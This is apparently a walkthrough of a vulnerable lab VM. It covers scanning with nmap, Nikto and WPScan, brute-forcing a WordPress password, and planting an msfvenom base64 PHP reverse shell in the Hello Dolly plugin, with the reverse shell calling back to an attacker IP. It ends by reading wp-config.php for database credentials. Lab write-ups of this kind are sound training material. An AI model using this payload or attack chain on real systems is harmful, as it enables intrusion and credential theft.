you can find the VM and more information from here.
open the ova file with vmware.
nmap results
nmap -Pn -sV -sS -sC 192.168.148.229
Starting Nmap 7.60 ( https://nmap.org ) at 2018-07-10 10:32 +0530
Nmap scan report for 192.168.148.229
Host is up (0.00057s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 65534 65534 4096 Mar 03 17:52 public
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.148.1
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 2.3.5 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 85:9f:8b:58:44:97:33:98:ee:98:b0:c1:85:60:3c:41 (DSA)
| 2048 cf:1a:04:e1:7b:a3:cd:2b:d1:af:7d:b3:30:e0:a0:9d (RSA)
|_ 256 97:e5:28:7a:31:4d:0a:89:b2:b0:25:81:d5:36:63:4c (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/backup_wordpress
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:41:F5:CC (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
FTP login
Nikto result
nikto -host http://192.168.148.229/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.148.229
+ Target Hostname: 192.168.148.229
+ Target Port: 80
+ Start Time: 2018-07-10 09:54:27 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, inode: 2140, size: 177, mtime: Sun Mar 4 00:47:59 2018
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.26
+ Uncommon header 'link' found, with contents: </backup_wordpress/?rest_route=/>; rel="https://api.w.org/"
+ Entry '/backup_wordpress/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8347 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2018-07-10 09:54:40 (GMT5.5) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
WP Scann - 1 user enumeration
wpscan --url http://192.168.148.229/backup_wordpress/ --enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.9.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
<--sniff -->
+] Enumerating usernames ...
[+] Identified the following 2 user/s:
+----+-------+------+
| Id | Login | Name |
+----+-------+------+
| 1 | admin | admi |
| 2 | john | joh |
+----+-------+------+
[!] Default first WordPress username 'admin' is still used
[+] Finished: Tue Jul 10 10:10:11 2018
[+] Requests Done: 57
[+] Memory used: 64.051 MB
[+] Elapsed time: 00:00:05
wpscan user bruteforce
wpscan --url http://192.168.148.229/backup_wordpress --wordlist /home/sura/Research-and-Development/password-dump/rockyou.txt --username john
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.9.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[+] URL: http://192.168.148.229/backup_wordpress/
[+] Started: Tue Jul 10 09:23:42 2018
<-- sniff -->
[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Starting the password brute forcer
[!] ERROR: We received an unknown response for login: john and password: enigma
^CBrute Forcing 'john' Time: 00:27:35 < > (11312 / 2902428) 0.38% ETA: ??:??:??
+----+-------+------+----------+
login to web site with username password found
Genarate Payload with msfvnom
msfvenom -p php/reverse_php lhost=192.168.148.1 lport=4445 -f raw -e php/base64
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4021 (iteration=0)
php/base64 chosen with final size 4021
Payload size: 4021 bytes
eval(base64_decode(ICAgIC8qPD9waHAgLyoqLwogICAgICBAZXJyb3JfcmVwb3J0aW5nKDApOwogICAgICBAc2V0X3RpbWVfbGltaXQoMCk7IEBpZ25vcmVfdXNlcl9hYm9ydCgxKTsgQGluaV9zZXQoJ21heF9leGVjdXRpb25fdGltZScsMCk7CiAgICAgICRkaXM9QGluaV9nZXQoJ2Rpc2FibGVfZnVuY3Rpb25zJyk7CiAgICAgIGlmKCFlbXB0eSgkZGlzKSl7CiAgICAgICAgJGRpcz1wcmVnX3JlcGxhY2UoJy9bLCBdKy8nLCAnLCcsICRkaXMpOwogICAgICAgICRkaXM9ZXhwbG9kZSgnLCcsICRkaXMpOwogICAgICAgICRkaXM9YXJyYXlfbWFwKCd0cmltJywgJGRpcyk7CiAgICAgIH1lbHNlewogICAgICAgICRkaXM9YXJyYXkoKTsKICAgICAgfQogICAgICAKICAgICRpcGFkZHI9JzE5Mi4xNjguMTQ4LjEnOwogICAgJHBvcnQ9NDQ0NTsKCiAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdlWlhhQ2UnKSl7CiAgICAgIGZ1bmN0aW9uIGVaWGFDZSgkYyl7CiAgICAgICAgZ2xvYmFsICRkaXM7CiAgICAgICAgCiAgICAgIGlmIChGQUxTRSAhPT0gc3RycG9zKHN0cnRvbG93ZXIoUEhQX09TKSwgJ3dpbicgKSkgewogICAgICAgICRjPSRjLiIgMj4mMVxuIjsKICAgICAgfQogICAgICAkdnRjTD0naXNfY2FsbGFibGUnOwogICAgICAkWkV3Zj0naW5fYXJyYXknOwogICAgICAKICAgICAgaWYoJHZ0Y0woJ3Byb2Nfb3Bl.bicpYW5kISRaRXdmKCdwcm9jX29wZW4nLCRkaXMpKXsKICAgICAgICAkaGFuZGxlPXByb2Nfb3BlbigkYyxhcnJheShhcnJheSgncGlwZScsJ3InKSxhcnJheSgncGlwZScsJ3cnKSxhcnJheSgncGlwZScsJ3cnKSksJHBpcGVzKTsKICAgICAgICAkbz1OVUxMOwogICAgICAgIHdoaWxlKCFmZW9mKCRwaXBlc1sxXSkpewogICAgICAgICAgJG8uPWZyZWFkKCRwaXBlc1sxXSwxMDI0KTsKICAgICAgICB9CiAgICAgICAgQHByb2NfY2xvc2UoJGhhbmRsZSk7CiAgICAgIH1lbHNlCiAgICAgIGlmKCR2dGNMKCdwYXNzdGhydScpYW5kISRaRXdmKCdwYXNzdGhydScsJGRpcykpewogICAgICAgIG9iX3N0YXJ0KCk7CiAgICAgICAgcGFzc3RocnUoJGMpOwogICAgICAgICRvPW9iX2dldF9jb250ZW50cygpOwogICAgICAgIG9iX2VuZF9jbGVhbigpOwogICAgICB9ZWxzZQogICAgICBpZigkdnRjTCgnc2hlbGxfZXhlYycpYW5kISRaRXdmKCdzaGVsbF9leGVjJywkZGlzKSl7CiAgICAgICAgJG89c2hlbGxfZXhlYygkYyk7CiAgICAgIH1lbHNlCiAgICAgIGlmKCR2dGNMKCdleGVjJylhbmQhJFpFd2YoJ2V4ZWMnLCRkaXMpKXsKICAgICAgICAkbz1hcnJheSgpOwogICAgICAgIGV4ZWMoJGMsJG8pOwogICAgICAgICRvPWpvaW4oY2hyKDEwKSwkbykuY2hyKDEwKTsKICAgICAgfWVsc2UKICAgICA.gaWYoJHZ0Y0woJ3N5c3RlbScpYW5kISRaRXdmKCdzeXN0ZW0nLCRkaXMpKXsKICAgICAgICBvYl9zdGFydCgpOwogICAgICAgIHN5c3RlbSgkYyk7CiAgICAgICAgJG89b2JfZ2V0X2NvbnRlbnRzKCk7CiAgICAgICAgb2JfZW5kX2NsZWFuKCk7CiAgICAgIH1lbHNlCiAgICAgIGlmKCR2dGNMKCdwb3BlbicpYW5kISRaRXdmKCdwb3BlbicsJGRpcykpewogICAgICAgICRmcD1wb3BlbigkYywncicpOwogICAgICAgICRvPU5VTEw7CiAgICAgICAgaWYoaXNfcmVzb3VyY2UoJGZwKSl7CiAgICAgICAgICB3aGlsZSghZmVvZigkZnApKXsKICAgICAgICAgICAgJG8uPWZyZWFkKCRmcCwxMDI0KTsKICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgQHBjbG9zZSgkZnApOwogICAgICB9ZWxzZQogICAgICB7CiAgICAgICAgJG89MDsKICAgICAgfQogICAgCiAgICAgICAgcmV0dXJuICRvOwogICAgICB9CiAgICB9CiAgICAkbm9mdW5jcz0nbm8gZXhlYyBmdW5jdGlvbnMnOwogICAgaWYoaXNfY2FsbGFibGUoJ2Zzb2Nrb3BlbicpYW5kIWluX2FycmF5KCdmc29ja29wZW4nLCRkaXMpKXsKICAgICAgJHM9QGZzb2Nrb3BlbigidGNwOi8vMTkyLjE2OC4xNDguMSIsJHBvcnQpOwogICAgICB3aGlsZSgkYz1mcmVhZCgkcywyMDQ4KSl7CiAgICAgICAgJG91dCA9ICcnOwogICAgICAgIGlmKHN1Yn.N0cigkYywwLDMpID09ICdjZCAnKXsKICAgICAgICAgIGNoZGlyKHN1YnN0cigkYywzLC0xKSk7CiAgICAgICAgfSBlbHNlIGlmIChzdWJzdHIoJGMsMCw0KSA9PSAncXVpdCcgfHwgc3Vic3RyKCRjLDAsNCkgPT0gJ2V4aXQnKSB7CiAgICAgICAgICBicmVhazsKICAgICAgICB9ZWxzZXsKICAgICAgICAgICRvdXQ9ZVpYYUNlKHN1YnN0cigkYywwLC0xKSk7CiAgICAgICAgICBpZigkb3V0PT09ZmFsc2UpewogICAgICAgICAgICBmd3JpdGUoJHMsJG5vZnVuY3MpOwogICAgICAgICAgICBicmVhazsKICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgZndyaXRlKCRzLCRvdXQpOwogICAgICB9CiAgICAgIGZjbG9zZSgkcyk7CiAgICB9ZWxzZXsKICAgICAgJHM9QHNvY2tldF9jcmVhdGUoQUZfSU5FVCxTT0NLX1NUUkVBTSxTT0xfVENQKTsKICAgICAgQHNvY2tldF9jb25uZWN0KCRzLCRpcGFkZHIsJHBvcnQpOwogICAgICBAc29ja2V0X3dyaXRlKCRzLCJzb2NrZXRfY3JlYXRlIik7CiAgICAgIHdoaWxlKCRjPUBzb2NrZXRfcmVhZCgkcywyMDQ4KSl7CiAgICAgICAgJG91dCA9ICcnOwogICAgICAgIGlmKHN1YnN0cigkYywwLDMpID09ICdjZCAnKXsKICAgICAgICAgIGNoZGlyKHN1YnN0cigkYywzLC0xKSk7CiAgICAgICAgfSBlbHNlIGlmIChzdWJzdHIoJGMsMCw0KSA9PSAncXVpd.CcgfHwgc3Vic3RyKCRjLDAsNCkgPT0gJ2V4aXQnKSB7CiAgICAgICAgICBicmVhazsKICAgICAgICB9ZWxzZXsKICAgICAgICAgICRvdXQ9ZVpYYUNlKHN1YnN0cigkYywwLC0xKSk7CiAgICAgICAgICBpZigkb3V0PT09ZmFsc2UpewogICAgICAgICAgICBAc29ja2V0X3dyaXRlKCRzLCRub2Z1bmNzKTsKICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgICB9CiAgICAgICAgfQogICAgICAgIEBzb2NrZXRfd3JpdGUoJHMsJG91dCxzdHJsZW4oJG91dCkpOwogICAgICB9CiAgICAgIEBzb2NrZXRfY2xvc2UoJHMpOwogICAgfQo));
paste payload into hello dolly plugin hello.php and update it. and active it
php reverse shell
database credentials found
cat /var/www/backup_wordpress/wp-config.php